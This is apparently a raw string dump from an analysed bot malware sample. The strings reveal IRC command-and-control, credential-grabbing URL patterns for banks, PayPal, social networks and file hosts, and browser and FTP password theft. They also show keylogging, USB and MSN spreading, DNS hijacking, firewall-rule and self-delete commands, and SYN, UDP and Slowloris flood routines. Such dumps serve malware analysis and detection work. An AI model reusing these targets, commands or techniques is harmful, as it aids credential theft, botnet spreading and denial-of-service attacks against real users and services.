i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
%s.p21-> Message hijacked!
msnmsg
msnmsg
CAL %d %6s
CAL %d %6s
ngr->blocksize: %d
ngr->blocksize: %d
block_size: %d
block_size: %d
\\.\pipe\%s
\\.\pipe\%s
kernel32.dll
kernel32.dll
%s_%d
%s_%d
-%sMutex
-%sMutex
ntdll.dll
ntdll.dll
%s-pid
%s-pid
%s-comm
%s-comm
JOIN #
JOIN #
PRIVMSG #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
PRIVMSG %5s
JOIN %5s
JOIN %5s
PRIVMSG
PRIVMSG
JOIN
JOIN
%s:%d
%s:%d
%s.%s%s
%s.%s%s
%S%s%s
%S%s%s
%s.%S%S
%s.%S%S
%S%S%S
%S%S%S
state_%s
state_%s
%s.%s (p='%S')
%s.%s (p='%S')
pop3://%s:%s@%s:%d
pop3://%s:%s@%s:%d
%s:%s@%s:%d
%s:%s@%s:%d
PTF://%s:%s@%s:%d
PTF://%s:%s@%s:%d
ftpgrab
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s.%s ->> %s : %s
%s-%s-%s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
webroot.
virusbuster.nprotect.
virusbuster.nprotect.
heck.tc
heck.tc
onecare.live.
onecare.live.
login[password]
login[password]
login[username]
login[username]
*members*.iknowthatgirl*/members*
*members*.iknowthatgirl*/members*
*youporn.*/login*
*youporn.*/login*
*members.brazzers.com*
*members.brazzers.com*
*bcointernacional*login*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*:2222/CMD_LOGIN*
*whcms*dologin*
*whcms*dologin*
*:2086/login*
*:2086/login*
*:2083/login*
*:2083/login*
*:2082/login*
*:2082/login*
*webnames.ru/*user_login*
*webnames.ru/*user_login*
Webnames
Webnames
*dotster.com/*login*
*dotster.com/*login*
loginid
loginid
*enom.com/login*
*enom.com/login*
login.Pass
login.Pass
login.User
login.User
*login.Pass=*
*login.Pass=*
*1and1.com/xml/config*
*1and1.com/xml/config*
*moniker.com/*Login*
*moniker.com/*Login*
LoginPassword
LoginPassword
LoginUserName
LoginUserName
*LoginPassword=*
*LoginPassword=*
*namecheap.com/*login*
*namecheap.com/*login*
loginname
loginname
*godaddy.com/login*
*godaddy.com/login*
Password
Password
*Password=*
*Password=*
*alertpay.com/login*
*alertpay.com/login*
*netflix.com/*ogin*
*netflix.com/*ogin*
*thepiratebay.org/login*
*thepiratebay.org/login*
*torrentleech.org/*login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*letitbit.net*
*what.cd/login*
*what.cd/login*
*oron.com/login*
*oron.com/login*
*filesonic.com/*login*
*filesonic.com/*login*
*speedyshare.com/login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploaded.to/*login*
*uploading.com/*login*
*uploading.com/*login*
loginUserPassword
loginUserPassword
loginUserName
loginUserName
*loginUserPassword=*
*loginUserPassword=*
*fileserv.com/login*
*fileserv.com/login*
*hotfile.com/login*
*hotfile.com/login*
*4shared.com/login*
*4shared.com/login*
txtpass
txtpass
*txtpass=*
*txtpass=*
*netload.in/index*
*netload.in/index*
*freakshare.com/login*
*freakshare.com/login*
login_pass
login_pass
*login_pass=*
*login_pass=*
*mediafire.com/*login*
*mediafire.com/*login*
*sendspace.com/login*
*sendspace.com/login*
*megaupload.*/*login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
*secure.logmein.*/*logincheck*
session[password]
session[password]
*password]=*
*password]=*
*twitter.com/sessions
*twitter.com/sessions
txtPassword
txtPassword
*&txtPassword=*
*&txtPassword=*
*.moneybookers.*/*login.pl
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*runescape*/*weblogin*
*&password=*
*&password=*
*no-ip*/login*
*no-ip*/login*
*steampowered*/login*
*steampowered*/login*
quick_password
quick_password
*hackforums.*/member.php
*hackforums.*/member.php
*facebook.*/login.php*
*facebook.*/login.php*
*login.yahoo.*/*login*
*login.yahoo.*/*login*
passwd
passwd
login
login
*passwd=*
*passwd=*
*login.live.*/*post.srf*
*login.live.*/*post.srf*
TextfieldPassword
TextfieldPassword
*TextfieldPassword=*
*TextfieldPassword=*
*gmx.*/*FormLogin*
*gmx.*/*FormLogin*
*Passwd=*
*Passwd=*
FLN-Password
FLN-Password
*FLN-Password=*
*FLN-Password=*
*pass=*
*pass=*
*bigstring.*/*index.php*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
*screenname.aol.*/login.psp*
password
password
loginId
loginId
*password=*
*password=*
*aol.*/*login.psp*
*aol.*/*login.psp*
Passwd
Passwd
*google.*/*ServiceLoginAuth*
*google.*/*ServiceLoginAuth*
login_password
login_password
login_email
login_email
*login_password=*
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
%s / ?%d HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
Mozilla/4.0
Mozilla/4.0
\\.\PHYSICALDRIVE0
\\.\PHYSICALDRIVE0
shell32.dll
shell32.dll
httpi
httpi
dnsapi.dll
dnsapi.dll
hXXp://%s/%s
hXXp://%s/%s
hXXp://%s/
hXXp://%s/
POST /23s
POST /23s
[%s{%s%s{%s
[%s{%s%s{%s
n%s[%s{%s%s{%s
n%s[%s{%s%s{%s
%s[%s{%s
%s[%s{%s
[DNS]: Redirecting "%s" to "%s"
[DNS]: Redirecting "%s" to "%s"
%s|%s
%s|%s
[Logins]: Cleared %d logins
[Logins]: Cleared %d logins
FTP ->
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
hXXp://
hXXp://
[Login]: %s
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
icon=shell32.dll,7
icon=shell32.dll,7
shellexecute=
shellexecute=
%windir%\system32\cmd.exe
%windir%\system32\cmd.exe
&&%%windir%%\explorer.exe %Ã%%%s
&&%%windir%%\explorer.exe %Ã%%%s
/c "start %Ã%%.Trashes\%s
/c "start %Ã%%.Trashes\%s
.Trashes
.Trashes
\\.\%c:
\\.\%c:
%s\%s
%s\%s
%sautorun.tmp
%sautorun.tmp
%sautorun.inf
%sautorun.inf
%0x.scr
%0x.scr
*bebo.*/c/profile/comment_post.json
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
msg_text
*facebook.*/ajax/chat/send.php*
*facebook.*/ajax/chat/send.php*
-_.!~*'()
-_.!~*'()
%s.%s hijacked!
%s.%s hijacked!
MSG %d %s %d
MSG %d %s %d
MSG %d %1s
MSG %d %1s
SDG %d %d
SDG %d %d
Content-Length: %d
Content-Length: %d
SDG %d
SDG %d
%s_0xX
%s_0xX
RegCreateKeyExW
RegCreateKeyExW
RegCreateKeyExA
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileW
URLDownloadToFileA
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestA
HttpSendRequestA
NtEnumerateValueKey
NtEnumerateValueKey
DNSAPI.dll
DNSAPI.dll
Secur32.dll
Secur32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
HttpQueryInfoA
HttpQueryInfoA
InternetOpenUrlA
InternetOpenUrlA
HttpQueryInfoW
HttpQueryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
WS2_32.dll
WS2_32.dll
MSVCRT.dll
MSVCRT.dll
GetProcessHeap
GetProcessHeap
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryW
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
a.baerr000.ru
a.baerr000.ru
a.joerv06.com
a.joerv06.com
a.tsroxybaa.com
a.tsroxybaa.com
fbi.gov
fbi.gov
]1.1.0.0
]1.1.0.0
msn.set
msn.set
msn.int
msn.int
http.set
http.set
http.int
http.int
http.inj
http.inj
logins
logins
PASS %s
PASS %s
[.ShellClassInfo]
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
SSRR %s 0 0 :%s
SSRR %s 0 0 :%s
KCIK %s
KCIK %s
SEND %s %s
SEND %s %s
PART %s
PART %s
PPPPMSG %s :%s
PPPPMSG %s :%s
QUIT :%s
QUIT :%s
PPNG %s
PPNG %s
PPPPMSG
PPPPMSG
[v="%s" c="%s" h="%s" p="%S"]
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[Visit]: Error visitng "%s"
[FTP Login]: %s
[FTP Login]: %s
[POP3 Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Login]: %s
[HTTP Traffic]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[DNS]: Blocked DNS "%s"
[MSN]: %s
[MSN]: %s
[HTTP]: %s
[HTTP]: %s
ftplog
ftplog
ftpinfect
ftpinfect
httplogin
httplogin
httptraff
httptraff
httpspread
httpspread
hXXp://api.wipmania.com/
hXXp://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\x_ipc
c:\%original file name%.exe
c:\%original file name%.exe
\\.\pipe\312a36d2
\\.\pipe\312a36d2
C:\Users\"%CurrentUserName%"\AppData\Roaming\B5D6.exe
C:\Users\"%CurrentUserName%"\AppData\Roaming\B5D6.exe
C:\Windows
C:\Windows
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Hplqlx.exe
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Hplqlx.exe
7 767
7 767
8*808;8~8
8*808;8~8
%s\Microsoft\%s.exe
%s\Microsoft\%s.exe
\\.\pipe
\\.\pipe
Internet Explorer\iexplore.exe
Internet Explorer\iexplore.exe
autorun.inf
autorun.inf
pidgin.exe
pidgin.exe
wlcomm.exe
wlcomm.exe
msnmsgr.exe
msnmsgr.exe
msmsgs.exe
msmsgs.exe
flock.exe
flock.exe
opera.exe
opera.exe
chrome.exe
chrome.exe
ieuser.exe
ieuser.exe
iexplore.exe
iexplore.exe
firefox.exe
firefox.exe
.ipconfig.exe
.ipconfig.exe
verclsid.exe
verclsid.exe
regedit.exe
regedit.exe
rundll32.exe
rundll32.exe
cmd.exe
cmd.exe
regsvr32.exe
regsvr32.exe
l"%s" %S
l"%s" %S
lol.exe
lol.exe
n127.0.0.1
n127.0.0.1
%s:Zone.Identifier
%s:Zone.Identifier
wininet.dll
wininet.dll
secur32.dll
secur32.dll
ws2_32.dll
ws2_32.dll
:%S%S\Desktop.ini
:%S%S\Desktop.ini
winlogon.exe
winlogon.exe
mspaint.exe
mspaint.exe
Aadvapi32.dll
Aadvapi32.dll
urlmon.dll
urlmon.dll
nspr4.dll
nspr4.dll
Akernel23.dll
Akernel23.dll
y%s\%s.exe
y%s\%s.exe
lsass.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\Users\"%CurrentUserName%"\AppData\Roaming\B5D6.exe
\Device\HarddiskVolume1\Users\"%CurrentUserName%"\AppData\Roaming\B5D6.exe
^C:\Users\"%CurrentUserName%"\AppData\Roaming\B5D6.exe
^C:\Users\"%CurrentUserName%"\AppData\Roaming\B5D6.exe
B5D6.exe_1928_rwx_002A0000_0001D000:
tcPLh
tcPLh
SQLw
SQLw
B5D6.exe_1928_rwx_002C0000_00007000:
.text
.text
`.rdata
`.rdata
XGZ^%s
XGZ^%s
tcP$a
tcP$a
#>n%D
#>n%D
B5D6.exe_1928_rwx_00400000_00008000:
.text
.text
`.rdata
`.rdata
XGZ^%s
XGZ^%s
tcP$a
tcP$a
#>n%D
#>n%D
B5D6.exe_1928_rwx_00550000_0000E000:
%uT"6
%uT"6
urlmon.dll
urlmon.dll
yahoo.com
yahoo.com
google.com
google.com
bing.com
bing.com
update.microsoft.com
update.microsoft.com
microsoft.com
microsoft.com
ntdll.dll
ntdll.dll
pool.ntp.org
pool.ntp.org
africa.pool.ntp.org
africa.pool.ntp.org
oceania.pool.ntp.org
oceania.pool.ntp.org
asia.pool.ntp.org
asia.pool.ntp.org
south-america.pool.ntp.org
south-america.pool.ntp.org
north-america.pool.ntp.org
north-america.pool.ntp.org
europe.pool.ntp.org
europe.pool.ntp.org
aReport
aReport
cdosys.dll
cdosys.dll
software\microsoft\windows nt\currentversion\image file execution options\taskmgr.exe
software\microsoft\windows nt\currentversion\image file execution options\taskmgr.exe
ws2_32.dll
ws2_32.dll
x3
x3
udPj
udPj
$4(4,40444
$4(4,40444
4 5(585`5|5
4 5(585`5|5
cmd.exe
cmd.exe
/c %s
/c %s
KBlu.exe
KBlu.exe
\system32\msiexec.exe
\system32\msiexec.exe
\SysWOW64\msiexec.exe
\SysWOW64\msiexec.exe
Mozilla/4.0
Mozilla/4.0
software\microsoft\windows\currentversion\policies\system
software\microsoft\windows\currentversion\policies\system
software\microsoft\windows\currentversion\Run
software\microsoft\windows\currentversion\Run
software\microsoft\windows nt\currentversion\Windows
software\microsoft\windows nt\currentversion\Windows
software\microsoft\windows\currentversion\Policies\Explorer\Run
software\microsoft\windows\currentversion\Policies\Explorer\Run
:Zone.Identifier
:Zone.Identifier
ms%s.exe
ms%s.exe
software\microsoft\windows\currentversion\explorer\advanced
software\microsoft\windows\currentversion\explorer\advanced
\cdo%lu.dll
\cdo%lu.dll
\system32\cdosys.dll
\system32\cdosys.dll
\SysWOW64\cdosys.dll
\SysWOW64\cdosys.dll
cdo%lu.dll
cdo%lu.dll
software\microsoft\windows\currentversion\policies\Explorer
software\microsoft\windows\currentversion\policies\Explorer
127.0.0.1
127.0.0.1
UC:\Windows\system32\*
UC:\Windows\system32\*
crypt32.dll
crypt32.dll
ion.dll
ion.dll
3456-A289-439d-8115-601632D005A0
3456-A289-439d-8115-601632D005A0
UC:\Windows\system32\crypt32.dll
UC:\Windows\system32\crypt32.dll
twunk_16.exe_3204:
.text
.text
`.rdata
`.rdata
@.data
@.data
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCreateKeyExW
RegCreateKeyExW
RegCloseKey
RegCloseKey
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
MSVCRT.dll
MSVCRT.dll
_acmdln
_acmdln
SHLWAPI.dll
SHLWAPI.dll
PSAPI.DLL
PSAPI.DLL
CRYPT32.dll
CRYPT32.dll
`0%x"
`0%x"
[8FTp}
[8FTp}
.QzQD
.QzQD
M .TI
M .TI
.Jg%4
.Jg%4
H.nH_
H.nH_
]`rDo%c
]`rDo%c
HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0
HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0
HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0
HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0
HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0
HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0
ping 127.0.0.1 -n 3&del "%s"
ping 127.0.0.1 -n 3&del "%s"
%s /c del %s
%s /c del %s
\kernel32.dll
\kernel32.dll
%s %s
%s %s
explorer.exe
explorer.exe
twunk_16.exe_3392:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
A
A
SSSSSSh
SSSSSSh
D$ PASSf
D$ PASSf
%s:ZKTDJRBHOEUDX
%s:ZKTDJRBHOEUDX
GET %s HTTP/1.1
GET %s HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
Mozilla/%i.0 (Windows NT %i.%i; %srv:%i.0) Gecko/20100101 Firefox/%i.0
Mozilla/%i.0 (Windows NT %i.%i; %srv:%i.0) Gecko/20100101 Firefox/%i.0
Mozilla/%i.0 (compatible; MSIE %i.0; Windows NT %i.%i; Trident/%i.0)
Mozilla/%i.0 (compatible; MSIE %i.0; Windows NT %i.%i; Trident/%i.0)
_wv=%s
_wv=%s
network.http.spdy.enabled.v3-1
network.http.spdy.enabled.v3-1
network.http.spdy.enabled
network.http.spdy.enabled
network.http.spdy.enabled.http2
network.http.spdy.enabled.http2
PTF://%s:%s@%s:%d
PTF://%s:%s@%s:%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings
HttpSendRequestW
HttpSendRequestW
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
%s\%ls\dmps\log.txt
%s\%ls\dmps\log.txt
%s\%ls\dmps\
%s\%ls\dmps\
%slog.txt
%slog.txt
%slogs.cab
%slogs.cab
%s\Thunderbird\profiles.ini
%s\Thunderbird\profiles.ini
%s\Thunderbird\%s
%s\Thunderbird\%s
Thunderbird.Url.news\DefaultIcon
Thunderbird.Url.news\DefaultIcon
Type - Mail | Name - %s | User - %s | Password - %s&
Type - Mail | Name - %s | User - %s | Password - %s&
HTTPMail User Name
HTTPMail User Name
HTTPMail Password2
HTTPMail Password2
POP3 Password2
POP3 Password2
pstorec.dll
pstorec.dll
%s%c%c
%s%c%c
\logins.json
\logins.json
%snss3.dll
%snss3.dll
PK11_GetInternalKeySlot
PK11_GetInternalKeySlot
PK11_CheckUserPassword
PK11_CheckUserPassword
encryptedPassword":
encryptedPassword":
hXXps://
hXXps://
-----------------------------%d
-----------------------------%d
Content-Disposition: form-data; name="data"; filename="%S"
Content-Disposition: form-data; name="data"; filename="%S"
POST %s HTTP/1.0
POST %s HTTP/1.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0
Content-Type: multipart/form-data; boundary=---------------------------%d
Content-Type: multipart/form-data; boundary=---------------------------%d
Content-Length: %d
Content-Length: %d
RegOpenKeyA
RegOpenKeyA
RegOpenKeyExA
RegOpenKeyExA
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
GetKeyNameTextW
GetKeyNameTextW
GetAsyncKeyState
GetAsyncKeyState
GetKeyboardLayout
GetKeyboardLayout
GetKeyboardState
GetKeyboardState
GetKeyState
GetKeyState
MapVirtualKeyW
MapVirtualKeyW
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegDeleteKeyW
RegDeleteKeyW
RegEnumKeyExA
RegEnumKeyExA
RegCreateKeyExA
RegCreateKeyExA
RegCreateKeyExW
RegCreateKeyExW
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
MSVCRT.dll
MSVCRT.dll
_acmdln
_acmdln
ntdll.dll
ntdll.dll
WININET.dll
WININET.dll
CRYPT32.dll
CRYPT32.dll
SHLWAPI.dll
SHLWAPI.dll
WS2_32.dll
WS2_32.dll
GdiplusShutdown
GdiplusShutdown
gdiplus.dll
gdiplus.dll
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Content-type: application/x-www-form-urlencoded
Content-type: application/x-www-form-urlencoded
netsh firewall add allowedprogram "%s" %s ENABLE
netsh firewall add allowedprogram "%s" %s ENABLE
netsh advfirewall firewall add rule name="%s" dir=in action=allow program="%s"
netsh advfirewall firewall add rule name="%s" dir=in action=allow program="%s"
cabinet.dll
cabinet.dll
chrome.dll
chrome.dll
Ws2_32.dll
Ws2_32.dll
%ls\screenshot.jpg
%ls\screenshot.jpg
\settings3.bin
\settings3.bin
\settings.rdp
\settings.rdp
ws2_32.dll
ws2_32.dll
wininet.dll
wininet.dll
f/s %s
f/s %s
xul.dll
xul.dll
nss3.dll
nss3.dll
nspr4.dll
nspr4.dll
Wininet.dll
Wininet.dll
okernel32.dll
okernel32.dll
Win Srv 2008
Win Srv 2008
Win Srv 2003
Win Srv 2003
Win Srv
Win Srv
Win XP
Win XP
d.d.d
d.d.d
[ %s | Time - d:d (d.d.%d) ]
[ %s | Time - d:d (d.d.%d) ]
%S\%i.jpg
%S\%i.jpg
dAccount65.stg
dAccount65.stg
Accounts70.tdat
Accounts70.tdat
Account71.rec0
Account71.rec0
Account.rec0
Account.rec0
\kernel32.dll
\kernel32.dll
%s %s
%s %s
PGdiPlus.dll
PGdiPlus.dll
schannel.dll
schannel.dll
ping 127.0.0.1 -n 3&del "%s"
ping 127.0.0.1 -n 3&del "%s"
%s /c del %s
%s /c del %s
filezilla.exe
filezilla.exe
ftprush.exe
ftprush.exe
winscp.exe
winscp.exe
corePTF.exe
corePTF.exe
freePTF.exe
freePTF.exe
far.exe
far.exe
ftpte.exe
ftpte.exe
smartPTF.exe
smartPTF.exe
flashfxp.exe
flashfxp.exe
totalcmd.exe
totalcmd.exe
twunk_16.exe_3204_rwx_00170000_0004E000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
=MSG t
=MSG t
>MSG u`
>MSG u`
=PASS
=PASS
8httpu1
8httpu1
8httpuM
8httpuM
tlSSSSSSSSSShL0
tlSSSSSSSSSShL0
Fv.TBv
Fv.TBv
%s.%s
%s.%s
%s.%S
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
%s.p21-> Message hijacked!
msnmsg
msnmsg
CAL %d %6s
CAL %d %6s
ngr->blocksize: %d
ngr->blocksize: %d
block_size: %d
block_size: %d
\\.\pipe\%s
\\.\pipe\%s
kernel32.dll
kernel32.dll
%s_%d
%s_%d
-%sMutex
-%sMutex
ntdll.dll
ntdll.dll
%s-pid
%s-pid
%s-comm
%s-comm
JOIN #
JOIN #
PRIVMSG #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
PRIVMSG %5s
JOIN %5s
JOIN %5s
PRIVMSG
PRIVMSG
JOIN
JOIN
%s:%d
%s:%d
%s.%s%s
%s.%s%s
%S%s%s
%S%s%s
%s.%S%S
%s.%S%S
%S%S%S
%S%S%S
state_%s
state_%s
%s.%s (p='%S')
%s.%s (p='%S')
pop3://%s:%s@%s:%d
pop3://%s:%s@%s:%d
%s:%s@%s:%d
%s:%s@%s:%d
PTF://%s:%s@%s:%d
PTF://%s:%s@%s:%d
ftpgrab
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s.%s ->> %s : %s
%s-%s-%s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
webroot.
virusbuster.nprotect.
virusbuster.nprotect.
heck.tc
heck.tc
onecare.live.
onecare.live.
login[password]
login[password]
login[username]
login[username]
*members*.iknowthatgirl*/members*
*members*.iknowthatgirl*/members*
*youporn.*/login*
*youporn.*/login*
*members.brazzers.com*
*members.brazzers.com*
*bcointernacional*login*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*:2222/CMD_LOGIN*
*whcms*dologin*
*whcms*dologin*
*:2086/login*
*:2086/login*
*:2083/login*
*:2083/login*
*:2082/login*
*:2082/login*
*webnames.ru/*user_login*
*webnames.ru/*user_login*
Webnames
